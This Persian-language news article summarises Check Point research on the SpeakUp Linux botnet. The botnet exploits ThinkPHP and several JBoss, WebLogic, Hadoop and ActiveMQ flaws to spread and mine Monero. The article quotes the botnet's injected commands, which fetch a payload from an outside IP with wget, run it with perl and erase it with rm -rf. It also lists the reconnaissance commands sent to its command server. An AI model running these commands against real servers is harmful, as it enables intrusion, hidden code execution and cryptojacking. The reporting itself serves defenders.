کارزار جدیدی کشف شده است که سرورهای لینوکسی را به یک بات‌نت آلوده می‌کند. تا به حال از این بات‌نت، که SpeakUp نامیده شده است، برای استخراج ارز مونرو استفاده شده است، اما به احتمال زیاد SpeakUp هدف مهمتری دارد.

محققان Check Point خبر از وجود بات‌نتی دادند که سرورهای لینوکسی را آلوده می‌کند. این بات‌نت از طریق یک آسیب‌پذیری در ThinkPHP برای آپلود شل PHP استفاده می‌کند.

آسیب‌پذیری نامبرده دارای شناسه CVE-2018-20062 است. مهاجم می‌تواند از این آسیب‌پذیری برای اجرای کد دلخواه استفاده کند. بات‌نت SpeakUp با ارسال درخواست GET زیر از این آسیب‌پذیری استفاده می‌کند:

این شل اجازه می‌دهد تا با درخواست‌های GET و ارسال پارامتر “module”، دستور دلخواه روی سرور قربانی اجرا شود. سپس یک درخواست دیگر به شکل زیر فرستاده می‌شود:

/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

که payload را در پوشه /tmp می‌فرستد.

Payload فوق با استفاده از یک درخواست دیگر با پارامتر module متفاوت اجرا می‌شود:

/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc

این دستور payload را اجرا می‌کند، دو ثانیه صبر می‌کند و سپس فایل آن را پاک می‌کند تا آثار چندانی به جای نگذارد.

تماس با خانه

پس از اجرا، بدافزار با سرور کنترل و فرمان (C&C) خود ارتباط برقرار می‌کند و اطلاعات بسیاری را در مورد ماشین قربانی می‌فرستد:

·         Uname (-r, -v, -m, -n,-a, -s)

·         Whoami

·         Ifconfig –a

·         Arp –a

·         cat /proc/cpuinfo | grep -c “cpu family” 2>&1

·         who –b

پس از آن بدافزار هر سه ثانیه با سرور تماس می‌گیرد و کسب تکلیف می‌کند. در حال حاضر C&C روی سرور قربانی کد استخراج ارز مونرو نصب می‌کند.

نقشه پراکندگی قربانیان بدافزار

انتشار

تروجان دارای مکانیزمی برای سرایت به ماشین‌های دیگر نیز هست، بدین شکل که به دنبال ماشین‌هایی با subnet mask داخلی و خارجی یکسان با سرور آلوده می‌گردد و در صورتی که ماشینی دچار آسیب‌پذیری‌های زیر باشد، اسکریپت SpeakUp روی آن نصب می‌شود.

·         CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities

·         CVE-2010-1871: JBoss Seam Framework remote code execution

·         JBoss AS 3/4/5/6: Remote Command Execution (exploit)

·         CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE

·         CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.

·         Hadoop YARN ResourceManager – Command Execution (exploit)

·         CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

با توجه به اینکه بات‌نت قابلیت بهره‌برداری از این طیف گسترده آسیب‌پذیری‌ها را دارد، احتمالا این بات‌نت برای منظور مهمتری از ارزکاوی نوشته شده است.

منبع:

https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/